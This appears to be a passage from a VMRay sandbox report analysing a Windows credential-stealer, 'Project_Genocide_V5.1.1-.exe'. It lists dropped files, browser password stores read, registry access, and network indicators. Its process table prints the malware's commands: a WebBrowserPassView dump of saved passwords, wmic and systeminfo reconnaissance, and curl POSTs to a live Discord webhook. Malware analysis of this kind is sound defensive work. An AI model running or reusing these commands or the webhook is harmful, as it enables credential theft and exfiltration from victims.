Monitor Duration 13.27s
Return Code 259
PID 3336
Parent PID 1428
Bitness 32 Bit
X-Ray Vision for Malware - www.vmray.com 42 / 55 DYNAMIC ANALYSIS REPORT #928218
Process #42: timeout.exe
ID 42
Filename c:\windows\system32\timeout.exe
Command Line timeout 5
Initial Working Directory C:\Users\RDhJ0CNFevzX\Desktop\
Monitor Start Time Start Time: 262202, Reason: Child Process
Unmonitor End Time End Time: 269128, Reason: Terminated
Monitor Duration 6.93s
Return Code 0
PID 1988
Parent PID 4936
Bitness 64 Bit
Host Behavior
Type Count
Module 2
System 93
File 44
X-Ray Vision for Malware - www.vmray.com 43 / 55 DYNAMIC ANALYSIS REPORT #928218
ARTIFACTS
File
SHA256 Filenames Category Filesize MIME Type Operations Verdict
129fd5ce9840c3181483 C: application/ 35527b70b1a6b8df1e1c \Users\RDhJ0CNFevzX\ Sample File 13847.00 KB vnd.microsoft.portable- MALICIOUS 0005f24d06b28130df7e Desktop\Project_Genoci executable d056 de_V5.1.1-.exe
d4bde482cc419f200f9f3 C: application/ a2fb284f3ead1ed3c5fe9 \Users\RDhJ0CNFevzX\ Dropped File 10.00 KB vnd.microsoft.portable- Access, Write, Create MALICIOUS e8581dbe4acbce68f8b1 AppData\Local\Temp\Kh executable 1e aaksqr.exe
f999357a17e672e87fbe C: application/ d66d14ba2bebd6fb04e0 \temp\WebBrowserPass Dropped File 391.50 KB vnd.microsoft.portable- Access, Write, Create MALICIOUS 58a1aae0f0fdc49a797f5 View.exe executable 8fe
f76ba0c9cc7614a11a7e 1217e2e738196d6da56 C:\temp\finalres.vbs Dropped File 2.21 KB text/plain Access, Write, Create SUSPICIOUS dec9c96f90a8a64d9f80 a4493
2bbd7b9dd041c4d84a4 application/ 51033b257d7db2f23e64 C:\temp\curl.exe Dropped File 4256.62 KB vnd.microsoft.portable- Access, Write, Create SUSPICIOUS 75f2e5d6e085e2e6f890 executable 43338
c: c2d814a34b184b7cdf10 \users\rdhj0cnfevzx\app e4e7a4311ff15db99326 data\local\microsoft\wind Modified File 128 bytes application/octet-stream CLEAN d6dd8d328b53bf9e19cc ows\inetcache\counters. f858 dat
7001466b051e89556ab C: b7f438c9b9cafba66a5d \Users\RDhJ0CNFevzX\ application/x-rar- Dropped File 10240.00 KB Access, Write, Create CLEAN 121de17082bd6423b73 AppData\Local\Temp\Jm compressed 33e3aa bwoud.rar
32bc4c92173d817cb245 c95505b26304e3c242a C:\temp\finalres.bat Dropped File 3.93 KB text/x-msdos-batch Access, Write, Create CLEAN b1ba77bcce003727e6e decb29
04084885435b6134e79 2c03f8b52bf6ea7135c7 Access, Delete, Write, C:\temp\finalres2.vbs Dropped File 344 bytes text/plain CLEAN bd7ff8d3cc3aaedae2c66 Create 7dae
2782f0f8e89c786f40240 fc1916677be660fb8d8e C:\temp\curl-ca- Dropped File 216.96 KB text/plain Access, Write, Create CLEAN 25dede50c9f6f7b0c2c21 bundle.crt 78
9313c411f761f8215e7e 73f7dc3486f5d10b8556 Read, Access, Write, C:\temp\WindowsInfo.txt Dropped File 113 bytes text/plain CLEAN a1164c3277791e312a8 Create 0b686
fd41cd2f48623ceb8d6d 4fa774c80efa5c3f22c94 C:\temp\ip_address.txt Dropped File 12 bytes text/plain Read, Access, Create CLEAN bfd7a7c59543772b585d 9a1
C:/temp/ b3d510ef04275ca8e698 RDhJ0CNFevzX_Passw e5b3cbb0ece3949ef925 ords.txt, C: Dropped File 2 bytes text/plain Access, Write, Create CLEAN 2f0cdc839e9ee347409a \temp\RDhJ0CNFevzX_ 2209 Passwords.txt
05925f6e122be3638245 8c1668c4b40c16809b3e C: Dropped File 678 bytes application/octet-stream Access, Create CLEAN 2ad5e65fde35f9ad52cef \temp\System_INFO.txt 072
Filename
Filename Category Operations Verdict
C: \Users\RDhJ0CNFevzX\Desktop\Project_Gen Accessed File Access CLEAN ocide_V5.1.1-.exe.config
C: \Users\RDhJ0CNFevzX\AppData\Local\Temp Dropped File Access, Write, Create CLEAN \Khaaksqr.exe
X-Ray Vision for Malware - www.vmray.com 44 / 55 DYNAMIC ANALYSIS REPORT #928218
Filename Category Operations Verdict
C: \Users\RDhJ0CNFevzX\AppData\Local\Temp Dropped File Access, Write, Create CLEAN \Jmbwoud.rar
C:\temp Accessed File Access, Create CLEAN
C: \Windows\Microsoft.NET\Framework64\v4.0. Accessed File Read, Access CLEAN 30319\Config\machine.config
C: \Users\RDhJ0CNFevzX\AppData\Local\Temp Accessed File Access CLEAN \Khaaksqr.exe.config
C:\temp\finalres.bat Dropped File Access, Write, Create CLEAN
C:\temp\finalres.vbs Dropped File Access, Write, Create CLEAN
C:\temp\finalres2.vbs Dropped File Access, Delete, Write, Create CLEAN
C:\temp\WebBrowserPassView.exe Dropped File Access, Write, Create CLEAN
C:\temp\curl-ca-bundle.crt Dropped File Access, Write, Create CLEAN
C:\temp\curl.exe Dropped File Access, Write, Create CLEAN
C:\Windows\System32\WScript.exe Accessed File Access CLEAN
C:\temp\WindowsInfo.txt Dropped File Read, Access, Write, Create CLEAN
"C:\temp\finalres.bat" Accessed File Access CLEAN
C: \Users\RDhJ0CNFevzX\AppData\Roaming\.c Accessed File Access CLEAN urlrc
C: \Users\RDhJ0CNFevzX\AppData\Roaming\_c Accessed File Access CLEAN urlrc
C:\temp\.curlrc Accessed File Access CLEAN
C:\temp\_curlrc Accessed File Access CLEAN
C:/Windows/System32/OpenSSL/ssl/ Accessed File Access CLEAN openssl.cnf
C:\temp\ip_address.txt Dropped File Read, Access, Create CLEAN
C:\temp\System_INFO.txt Dropped File Access, Create CLEAN
C:\temp\WebBrowserPassView_lng.ini Accessed File Access CLEAN
C:\temp\WebBrowserPassView.cfg Accessed File Read, Access CLEAN
C: \Users\RDhJ0CNFevzX\AppData\Local\Micro Accessed File Access CLEAN soft\Windows\WebCache\WebCacheV01.dat
C:\Windows\System32\winlogon.exe Accessed File Access CLEAN
C:\Windows\System32\lsass.exe Accessed File Access CLEAN
C:\Windows\System32\svchost.exe Accessed File Access CLEAN
C:\Windows\System32\dwm.exe Accessed File Access CLEAN
C:\Windows\System32\spoolsv.exe Accessed File Access CLEAN
C:\Program Files\Common Files\microsoft Accessed File Access CLEAN shared\ClickToRun\OfficeClickToRun.exe
C:\Windows\System32\sihost.exe Accessed File Access CLEAN
C:\Windows\System32\taskhostw.exe Accessed File Access CLEAN
C:\Windows\explorer.exe Accessed File Access CLEAN
X-Ray Vision for Malware - www.vmray.com 45 / 55 DYNAMIC ANALYSIS REPORT #928218
Filename Category Operations Verdict
C:\Windows\System32\RuntimeBroker.exe Accessed File Access CLEAN
C: \Windows\SystemApps\ShellExperienceHost Accessed File Access CLEAN _cw5n1h2txyewy\ShellExperienceHost.exe
C: \Windows\SystemApps\Microsoft.Windows.C Accessed File Access CLEAN ortana_cw5n1h2txyewy\SearchUI.exe
C:\Windows\System32\wbem\WMIADAP.exe Accessed File Access CLEAN
C: \Windows\System32\backgroundTaskHost.ex Accessed File Access CLEAN e
C:\Windows\System32\wbem\WmiPrvSE.exe Accessed File Access CLEAN
C:\Program Files\WindowsApps\Microsoft.Messaging_1.1 Accessed File Access CLEAN 0.22012.0_x86__8wekyb3d8bbwe\SkypeHost .exe
C:\Program Files\Internet Accessed File Access CLEAN Explorer\iexplore.exe
C:\Program Files (x86)\Internet Accessed File Access CLEAN Explorer\iexplore.exe
C:\Program Files Accessed File Access CLEAN (x86)\WindowsPowerShell\always-source.exe
C:\Program Files\Windows Photo Accessed File Access CLEAN Viewer\knowseveralcharacter.exe
C:\Program Files\Common Files\result.exe Accessed File Access CLEAN
C:\Program Files (x86)\Windows Accessed File Access CLEAN NT\audience-hold.exe
C:\Program Files\Uninstall Accessed File Access CLEAN Information\daughter_hang_others.exe
C:\Program Files\Windows Portable Accessed File Access CLEAN Devices\section step.exe
C:\Program Files\MSBuild\addwide.exe Accessed File Access CLEAN
C:\Program Files (x86)\Microsoft Accessed File Access CLEAN Office\stuff_must.exe
C:\Program Files Accessed File Access CLEAN (x86)\Microsoft.NET\consider represent.exe
C:\Program Files (x86)\Common Accessed File Access CLEAN Files\age.exe
C:\Program Files (x86)\Windows Accessed File Access CLEAN Defender\every.exe
C:\Program Files (x86)\Windows Portable Accessed File Access CLEAN Devices\season_contain_spring.exe
C:\Program Files\Internet Accessed File Access CLEAN Explorer\maintain.exe
C:\Program Files\Windows Accessed File Access CLEAN Sidebar\scientist.exe
C:\Program Files (x86)\Reference Accessed File Access CLEAN Assemblies\compare several.exe
C:\Program Files (x86)\MSBuild\call Accessed File Access CLEAN themselves surface.exe
C:\Program Files\MSBuild\project.exe Accessed File Access CLEAN
C:\Program Files\Windows Accessed File Access CLEAN Sidebar\identify.exe
C:\Program Files Accessed File Access CLEAN (x86)\Microsoft.NET\3dftp.exe
X-Ray Vision for Malware - www.vmray.com 46 / 55 DYNAMIC ANALYSIS REPORT #928218
Filename Category Operations Verdict
C:\Program Files (x86)\Windows Photo Accessed File Access CLEAN Viewer\absolutetelnet.exe
C:\Program Files (x86)\Internet Accessed File Access CLEAN Explorer\alftp.exe
C:\Program Files Accessed File Access CLEAN (x86)\WindowsPowerShell\barca.exe
C:\Program Files\Uninstall Accessed File Access CLEAN Information\bitkinex.exe
C:\Program Files\Windows Media Accessed File Access CLEAN Player\coreftp.exe
C:\Program Files Accessed File Access CLEAN (x86)\WindowsPowerShell\far.exe
C:\Program Files\MSBuild\filezilla.exe Accessed File Access CLEAN
C:\Program Files\Uninstall Accessed File Access CLEAN Information\flashfxp.exe
C:\Program Files (x86)\Windows Accessed File Access CLEAN Defender\fling.exe
C:\Program Files\Windows Portable Accessed File Access CLEAN Devices\foxmailincmail.exe
C:\Program Files\Common Accessed File Access CLEAN Files\gmailnotifierpro.exe
C:\Program Files (x86)\Reference Accessed File Access CLEAN Assemblies\icq.exe
C:\Program Files\Windows Multimedia Accessed File Access CLEAN Platform\leechftp.exe
C:\Program Files\Windows Portable Accessed File Access CLEAN Devices\ncftp.exe
C:\Program Files (x86)\Windows Photo Accessed File Access CLEAN Viewer\notepad.exe
C:\Program Files (x86)\Microsoft Accessed File Access CLEAN Office\operamail.exe
C:\Program Files\Windows Mail\outlook.exe Accessed File Access CLEAN
C:\Program Files (x86)\Windows Accessed File Access CLEAN NT\pidgin.exe
C:\Program Files\Windows Accessed File Access CLEAN Sidebar\scriptftp.exe
C:\Program Files\Windows Media Accessed File Access CLEAN Player\skype.exe
C:\Program Files (x86)\MSBuild\smartftp.exe Accessed File Access CLEAN
C:\Program Files (x86)\Windows Accessed File Access CLEAN Defender\thunderbird.exe
C:\Program Files\Internet Explorer\trillian.exe Accessed File Access CLEAN
C:\Program Files (x86)\Windows Accessed File Access CLEAN Sidebar\webdrive.exe
C:\Program Files (x86)\Reference Accessed File Access CLEAN Assemblies\whatsapp.exe
C:\Program Files\Windows Multimedia Accessed File Access CLEAN Platform\winscp.exe
C:\Program Files (x86)\WindowsPowerShell\yahoomessenger. Accessed File Access CLEAN exe
C:\Program Files (x86)\Reference Accessed File Access CLEAN Assemblies\active-charge.exe
C:\Program Files\Windows Media Accessed File Access CLEAN Player\accupos.exe
X-Ray Vision for Malware - www.vmray.com 47 / 55 DYNAMIC ANALYSIS REPORT #928218
Filename Category Operations Verdict
C:\Program Files Accessed File Access CLEAN (x86)\WindowsPowerShell\afr38.exe
C:\Program Files (x86)\MSBuild\aldelo.exe Accessed File Access CLEAN
C:\Program Files\Windows Multimedia Accessed File Access CLEAN Platform\ccv_server.exe
C:\Program Files\Common Accessed File Access CLEAN Files\centralcreditcard.exe
C:\Program Files (x86)\Windows Media Accessed File Access CLEAN Player\creditservice.exe
C:\Program Files\Windows Photo Accessed File Access CLEAN Viewer\edcsvr.exe
C:\Program Files\Common Files\fpos.exe Accessed File Access CLEAN
C:\Program Files\Uninstall Accessed File Access CLEAN Information\isspos.exe
C:\Program Files\Windows Accessed File Access CLEAN Sidebar\mxslipstream.exe
C:\Program Files\Reference Accessed File Access CLEAN Assemblies\omnipos.exe
C:\Program Files Accessed File Access CLEAN (x86)\WindowsPowerShell\spcwin.exe
C:\Program Files (x86)\Windows Photo Accessed File Access CLEAN Viewer\spgagentservice.exe
C:\Program Files (x86)\Windows Photo Accessed File Access CLEAN Viewer\utg2.exe
C:\Program Files (x86)\Windows Portable Accessed File Access CLEAN Devices\activity send best.exe
C:\Program Files\Windows Photo Accessed File Access CLEAN Viewer\necessary_various.exe
C:\Program Files\Windows Portable Accessed File Access CLEAN Devices\firstquiteacross.exe
C:\Program Files\Windows Defender\left Accessed File Access CLEAN market.exe
C:\Windows\System32\wbem\WmiApSrv.exe Accessed File Access CLEAN
C:\Windows\System32\msfeedssync.exe Accessed File Access CLEAN
C:\Windows\System32\OpenWith.exe Accessed File Access CLEAN
C:\Windows\System32\cmd.exe Accessed File Access CLEAN
C:\Windows\System32\conhost.exe Accessed File Access CLEAN
C:\Windows\System32\systeminfo.exe Accessed File Access CLEAN
C:\Windows\System32\findstr.exe Accessed File Access CLEAN
C: \Users\RDhJ0CNFevzX\AppData\Roaming\M Accessed File Access CLEAN ozilla\Firefox\profiles.ini
C: \Users\RDhJ0CNFevzX\AppData\Roaming\M Accessed File Access CLEAN ozilla\SeaMonkey\profiles.ini
C: \Users\RDhJ0CNFevzX\AppData\Roaming\W Accessed File Access CLEAN aterfox\profiles.ini
C: \Users\RDhJ0CNFevzX\AppData\Local\Yand Accessed File Access CLEAN ex\YandexBrowser\User Data\Default\Login Data
C: \Users\RDhJ0CNFevzX\AppData\Local\Vival Accessed File Access CLEAN di\User Data\Default\Login Data
X-Ray Vision for Malware - www.vmray.com 48 / 55 DYNAMIC ANALYSIS REPORT #928218
Filename Category Operations Verdict
C: \Users\RDhJ0CNFevzX\AppData\Roaming\A Accessed File Access CLEAN pple Computer\Preferences\keychain.plist
C: \Users\RDhJ0CNFevzX\AppData\Roaming\O Accessed File Access CLEAN pera\Opera\wand.dat
C: \Users\RDhJ0CNFevzX\AppData\Roaming\O Accessed File Access CLEAN pera\Opera7\profile\wand.dat
C: \Users\RDhJ0CNFevzX\AppData\Roaming\O Accessed File Access CLEAN pera Software\Opera Stable\Login Data
C:/temp/RDhJ0CNFevzX_Passwords.txt Dropped File Access, Write, Create CLEAN
C:\Windows\system32\wbem\XSL- Accessed File Access CLEAN Mappings.xml
C:\Windows\system32\wbem\\texttable.xsl Accessed File Access CLEAN
echo. Accessed File Access CLEAN
"C:\temp\filed.exe" Accessed File Access CLEAN
C:\Windows\SysWOW64\WerFault.exe Accessed File Access CLEAN
"C:\temp\CustomEXE.exe" Accessed File Access CLEAN
NUL Accessed File Access, Create CLEAN
C:\Windows\system32\timeout.exe Accessed File Access CLEAN
C:\temp\filed.exe Accessed File Access CLEAN
\??\C:\temp\filed.exe Accessed File Access CLEAN
\??\C:\temp\ip_address.txt Accessed File Access CLEAN
\??\C:\temp\WindowsInfo.txt Accessed File Access CLEAN
C:\temp\RDhJ0CNFevzX_Passwords.txt Dropped File Access CLEAN
\??\C:\temp\RDhJ0CNFevzX_Passwords.txt Accessed File Access CLEAN
\??\C:\temp\curl-ca-bundle.crt Accessed File Access CLEAN
\??\C:\temp\curl.exe Accessed File Access CLEAN
C:\temp\CustomEXE.exe Accessed File Access CLEAN
\??\C:\temp\finalres.bat Accessed File Access CLEAN
URL
URL Category IP Address Country HTTP Methods Verdict
https://discordapp.com/api/ webhooks/ 823564721483284501/ QMQntkAnLImKnVmntNAKB CLEAN fD7Snborid4Jzdex0GecVGO bxNacU_ZS1T_PVgEGH6wf q6T
https://myexternalip.com/raw CLEAN
Domain
Domain IP Address Country Protocols Verdict
162.159.135.233, 162.159.129.233, discordapp.com 162.159.133.233, 162.159.134.233, HTTPS, DNS, HTTP CLEAN 162.159.130.233
X-Ray Vision for Malware - www.vmray.com 49 / 55 DYNAMIC ANALYSIS REPORT #928218
Domain IP Address Country Protocols Verdict
216.239.32.21, 216.239.38.21, myexternalip.com HTTPS, DNS, HTTP CLEAN 216.239.36.21, 216.239.34.21
162.159.129.233, 162.159.133.233, cdn.discordapp.com 162.159.134.233, 162.159.135.233, DNS CLEAN 162.159.130.233
185.199.110.133, 185.199.111.133, raw.githubusercontent.com DNS CLEAN 185.199.108.133, 185.199.109.133
github.com 140.82.121.4 DNS CLEAN
IP
IP Address Domains Country Protocols Verdict
94.114.3.195 Germany CLEAN
192.168.0.1 - UDP, DNS CLEAN
185.199.109.133 raw.githubusercontent.com United States TCP, DNS, HTTPS CLEAN
discordapp.com, 162.159.130.233 - TCP, DNS, HTTPS CLEAN cdn.discordapp.com
140.82.121.4 github.com United States TCP, DNS, HTTPS CLEAN
216.239.34.21 myexternalip.com United States TCP, DNS CLEAN
discordapp.com, 162.159.133.233 - DNS CLEAN cdn.discordapp.com
discordapp.com, 162.159.135.233 - DNS CLEAN cdn.discordapp.com
discordapp.com, 162.159.129.233 - DNS CLEAN cdn.discordapp.com
discordapp.com, 162.159.134.233 - DNS CLEAN cdn.discordapp.com
185.199.108.133 raw.githubusercontent.com United States DNS CLEAN
185.199.111.133 raw.githubusercontent.com United States DNS CLEAN
185.199.110.133 raw.githubusercontent.com United States DNS CLEAN
216.239.32.21 myexternalip.com United States DNS CLEAN
216.239.36.21 myexternalip.com United States DNS CLEAN
216.239.38.21 myexternalip.com United States DNS CLEAN
127.0.0.1 - TCP CLEAN
-
Email Address
-
Mutex
-
Registry
Registry Key Operations Parent Process Name Verdict
HKEY_LOCAL_MACHINE\Software\Microsoft access project_genocide_v5.1.1-.exe, werfault.exe CLEAN \.NETFramework
X-Ray Vision for Malware - www.vmray.com 50 / 55 DYNAMIC ANALYSIS REPORT #928218
Registry Key Operations Parent Process Name Verdict
HKEY_LOCAL_MACHINE\Software\Microsoft \.NETFramework\DbgJITDebugLaunchSettin read, access project_genocide_v5.1.1-.exe CLEAN g
HKEY_LOCAL_MACHINE\Software\Microsoft read, access project_genocide_v5.1.1-.exe CLEAN \.NETFramework\DbgManagedDebugger
HKEY_LOCAL_MACHINE\SOFTWARE\Micr access khaaksqr.exe CLEAN osoft\.NETFramework\XML
HKEY_CURRENT_USER\SOFTWARE\Micro access khaaksqr.exe CLEAN soft\.NETFramework\XML
HKEY_LOCAL_MACHINE\Software\Microsoft access khaaksqr.exe CLEAN \Windows NT\CurrentVersion
HKEY_LOCAL_MACHINE\Software\Microsoft read, access khaaksqr.exe CLEAN \Windows NT\CurrentVersion\InstallationType
HKEY_CURRENT_USER access khaaksqr.exe CLEAN
HKEY_CURRENT_USER\SOFTWARE\Micro soft\Windows\CurrentVersion\Internet access khaaksqr.exe CLEAN Settings\Connections
HKEY_LOCAL_MACHINE\SOFTWARE\Micr osoft\Windows\CurrentVersion\Internet access khaaksqr.exe CLEAN Settings\Connections
HKEY_LOCAL_MACHINE\SOFTWARE\Polici es\Microsoft\Windows\CurrentVersion\Interne access khaaksqr.exe CLEAN t Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Micr access khaaksqr.exe CLEAN osoft\.NETFramework
HKEY_LOCAL_MACHINE\SOFTWARE\Micr read, access khaaksqr.exe CLEAN osoft\.NETFramework\LegacyWPADSupport
HKEY_LOCAL_MACHINE\SOFTWARE\Micr osoft\Windows NT\CurrentVersion\Time access khaaksqr.exe CLEAN Zones\W. Europe Standard Time
HKEY_LOCAL_MACHINE\SOFTWARE\Micr osoft\Windows NT\CurrentVersion\Time read, access khaaksqr.exe CLEAN Zones\W. Europe Standard Time\TZI
HKEY_LOCAL_MACHINE\SOFTWARE\Micr osoft\Windows NT\CurrentVersion\Time access khaaksqr.exe CLEAN Zones\W. Europe Standard Time\Dynamic DST
HKEY_LOCAL_MACHINE\SOFTWARE\Micr osoft\Windows NT\CurrentVersion\Time read, access khaaksqr.exe CLEAN Zones\W. Europe Standard Time\MUI_Display
HKEY_LOCAL_MACHINE\SOFTWARE\Micr osoft\Windows NT\CurrentVersion\Time read, access khaaksqr.exe CLEAN Zones\W. Europe Standard Time\MUI_Std
HKEY_LOCAL_MACHINE\SOFTWARE\Micr osoft\Windows NT\CurrentVersion\Time read, access khaaksqr.exe CLEAN Zones\W. Europe Standard Time\MUI_Dlt
HKEY_PERFORMANCE_DATA access khaaksqr.exe, project_genocide_v5.1.1-.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Micr access khaaksqr.exe CLEAN osoft\.NETFramework\v4.0.30319
HKEY_LOCAL_MACHINE\SOFTWARE\Micr osoft\.NETFramework\v4.0.30319\HWRPortR read, access khaaksqr.exe CLEAN euseOnSocketBind
HKEY_LOCAL_MACHINE\SOFTWARE\Micr access khaaksqr.exe CLEAN osoft\.NETFramework\AppContext
HKEY_LOCAL_MACHINE\SOFTWARE\Micr osoft\.NETFramework\v4.0.30319\SchUseStr read, access khaaksqr.exe CLEAN ongCrypto
HKEY_LOCAL_MACHINE\SOFTWARE\Micr osoft\.NETFramework\v4.0.30319\System.Ne access khaaksqr.exe CLEAN t.ServicePointManager.SecurityProtocol
HKEY_LOCAL_MACHINE\SOFTWARE\Micr access wscript.exe CLEAN osoft\Windows NT\CurrentVersion
X-Ray Vision for Malware - www.vmray.com 51 / 55 DYNAMIC ANALYSIS REPORT #928218
Registry Key Operations Parent Process Name Verdict
HKEY_LOCAL_MACHINE\SOFTWARE\Micr osoft\Windows read, access wscript.exe CLEAN NT\CurrentVersion\DigitalProductId
HKEY_LOCAL_MACHINE\SOFTWARE\Micr osoft\Windows read, access wscript.exe CLEAN NT\CurrentVersion\ProductName
HKEY_LOCAL_MACHINE\SOFTWARE\Micr read, access wscript.exe CLEAN osoft\Windows NT\CurrentVersion\ProductID
HKEY_CURRENT_USER\Software\Microsoft access webbrowserpassview.exe CLEAN \Internet Explorer\IntelliForms\Storage2
HKEY_LOCAL_MACHINE\SOFTWARE\Micr access wmic.exe CLEAN osoft\Wbem\CIMOM
HKEY_LOCAL_MACHINE\SOFTWARE\Micr read, access wmic.exe CLEAN osoft\Wbem\CIMOM\Logging
HKEY_LOCAL_MACHINE\SOFTWARE\Micr read, access wmic.exe CLEAN osoft\Wbem\CIMOM\Logging Directory
HKEY_LOCAL_MACHINE\SOFTWARE\Micr read, access wmic.exe CLEAN osoft\Wbem\CIMOM\Log File Max Size
HKEY_CURRENT_USER\Software\Microsoft access werfault.exe CLEAN \.NETFramework
HKEY_LOCAL_MACHINE\Software\Microsoft read, access werfault.exe CLEAN \.NETFramework\DbgDACSkipVerifyDlls
Process
Process Name Commandline Verdict
"C: project_genocide_v5.1.1-.exe \Users\RDhJ0CNFevzX\Desktop\Project_Genocide_V5.1.1-.e MALICIOUS xe"
"C: khaaksqr.exe MALICIOUS \Users\RDhJ0CNFevzX\AppData\Local\Temp\Khaaksqr.exe"
C:/temp/WebBrowserPassView.exe /stext "C:/temp/ webbrowserpassview.exe MALICIOUS RDhJ0CNFevzX_Passwords.txt"
C:/temp/curl -X POST -H "Content-type: application/json" -- data "{\"content\": \"**INJECTION STARTED!**\"}" https:// curl.exe discordapp.com/api/webhooks/823564721483284501/ SUSPICIOUS QMQntkAnLImKnVmntNAKBfD7Snborid4Jzdex0GecVGObxN acU_ZS1T_PVgEGH6wfq6T
curl.exe C:/temp/curl "https://myexternalip.com/raw" SUSPICIOUS
wmic.exe wmic diskdrive get size SUSPICIOUS
wmic.exe wmic bios get serialnumber SUSPICIOUS
wmic.exe wmic cpu get name SUSPICIOUS
C:/temp/curl -X POST -H "Content-type: application/json" -- data "{\"content\": \"**RDhJ0CNFevzX**\n```asciidoc\nTime and Date :: ...... n\"}" https://discordapp.com/api/webhooks/ curl.exe SUSPICIOUS 823564721483284501/ QMQntkAnLImKnVmntNAKBfD7Snborid4Jzdex0GecVGObxN acU_ZS1T_PVgEGH6wfq6T
openwith.exe C:\Windows\system32\OpenWith.exe -Embedding CLEAN
wscript.exe "C:\Windows\System32\WScript.exe" "C:\temp\finalres.vbs" CLEAN
wscript.exe "C:\Windows\System32\WScript.exe" "C:\temp\finalres2.vbs" CLEAN
cmd.exe C:\Windows\system32\cmd.exe /c ""C:\temp\finalres.bat" " CLEAN
systeminfo.exe systeminfo CLEAN
findstr.exe findstr /c:"Host Name" CLEAN
findstr.exe findstr /c:"Domain" CLEAN
X-Ray Vision for Malware - www.vmray.com 52 / 55 DYNAMIC ANALYSIS REPORT #928218
Process Name Commandline Verdict
findstr.exe findstr /c:"OS Name" CLEAN
findstr.exe findstr /c:"OS Version" CLEAN
findstr.exe findstr /c:"System Manufacturer" CLEAN
findstr.exe findstr /c:"System Model" CLEAN
findstr.exe findstr /c:"System type" CLEAN
findstr.exe findstr /c:"Total Physical Memory" CLEAN
filed.exe "C:\temp\filed.exe" --processStart filed.exe CLEAN
werfault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1428 -s 692 CLEAN
timeout.exe timeout 5 CLEAN
X-Ray Vision for Malware - www.vmray.com 53 / 55 DYNAMIC ANALYSIS REPORT #928218
YARA / AV
YARA (1)
Ruleset Name Rule Name Rule Description File Type Filename Classification Verdict
PowerShell may attempt PowerShell_Registry_C Generic to read/write system Dropped File C:\temp\finalres.vbs 2/5 ommands registry
Antivirus (3)
File Type Threat Name Filename Verdict
C: SAMPLE Gen:Variant.Razy.680050 \Users\RDhJ0CNFevzX\Desktop\Project_Gen MALICIOUS ocide_V5.1.1-.exe
C: DROPPED Gen:Variant.Agentus.62 \Users\RDhJ0CNFevzX\AppData\Local\Temp MALICIOUS \Khaaksqr.exe
DROPPED Gen:Application.Heur.yq0@kibVd8eO C:\temp\WebBrowserPassView.exe SUSPICIOUS
X-Ray Vision for Malware - www.vmray.com 54 / 55 DYNAMIC ANALYSIS REPORT #928218
ENVIRONMENT
Virtual Machine Information
Name win10_64_th2_en_mso2016
Description win10_64_th2_en_mso2016
Architecture x86 64-bit
Operating System Windows 10 Threshold 2
Kernel Version 10.0.10586.0 (0de6dc23-8e19-4bb7-8608-d54b1e6fa379)
Network Scheme Name Local Gateway
Network Config Name Local Gateway
Analyzer Information
Analyzer Version 4.1.1
Dynamic Engine Version 4.1.1 / 02/08/2021 15:19
Static Engine Version 1.6.0
Built-in AV Version AVCORE v2.2 Linux/x86_64 11.0.1.19 (November 12, 2020)
Built-in AV Database Update 2021-03-23 09:59:16+00:00 Release Date
VTI Ruleset Version 3.8
YARA Built-in Ruleset Version 1.5
Analysis Report Layout Version 10
Software Information
Adobe Acrobat Reader Version Not installed
Microsoft Office 2016
Microsoft Office Version 16.0.4266.1003
Internet Explorer Version 11.0.10586.0
Chrome Version Not installed
Firefox Version Not installed
Flash Version Not installed
Java Version Not installed
X-Ray Vision for Malware - www.vmray.com 55 / 55